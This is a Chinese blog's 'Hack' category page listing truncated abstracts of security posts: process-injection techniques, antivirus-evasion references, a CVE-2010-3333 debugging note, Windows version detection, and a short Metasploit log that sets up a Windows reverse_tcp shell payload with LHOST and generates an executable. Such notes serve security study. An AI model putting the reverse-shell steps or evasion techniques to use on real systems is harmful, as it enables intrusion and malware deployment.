随笔分类 -  Hack

ring3注入,研究
摘要:十种注入技巧:具有通用性的进程注入技巧研究 https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process https: 阅读全文
posted @ 2018-03-09 17:10 m4sterx 阅读(157) 评论(0) 推荐(0) 编辑
msf 使用记录
摘要:1. msfconsole 2. show payloads 3. use windows/shell/reverse_tcp 4. show options 5. set LHOST 192.168.x.x 6. generate -h 7. generate -f r_tcp.exe -t ex 阅读全文
posted @ 2018-02-07 09:02 m4sterx 阅读(641) 评论(0) 推荐(0) 编辑
对抗杀软高级启发(主动防御)技术
摘要:反检测技术之反病毒检测 http://pferrie.host22.com/papers/antidebug.pdf https://paper.seebug.org/222/ https://pentest.blog/art-of-anti-detection-1-introduction-to- 阅读全文
posted @ 2018-01-30 14:29 m4sterx 阅读(761) 评论(0) 推荐(0) 编辑
cve-2010-3333 分析简笔
摘要:昨天分析了半拉,感觉整个过程很条理;但是今天再接着昨天的思路往下调试的时候,不知该在哪下断点了,翻阅了昨天的随手的记录才有了些印象,但是思路还是一团。看来写篇随笔还是很有必要的。故作此文。 调试环境: xp sp3 english 调试工具: immdbg 调试对象: 参考: 《漏洞战争》 以及 h 阅读全文
posted @ 2017-05-18 11:37 m4sterx 阅读(668) 评论(0) 推荐(0) 编辑
根据版本号获取对应的windows系统
摘要:http://chenhailong.iteye.com/blog/1856505 GetVersionEx 在win8以后已经不好用了,请使用RtlGetVersion ,具体使用请查看MSDN 还可以利用 _KUSER_SHARED_DATA 获取准确的 版本号 win10 系统下x86 程序调 阅读全文
posted @ 2017-04-12 18:41 m4sterx 阅读(372) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示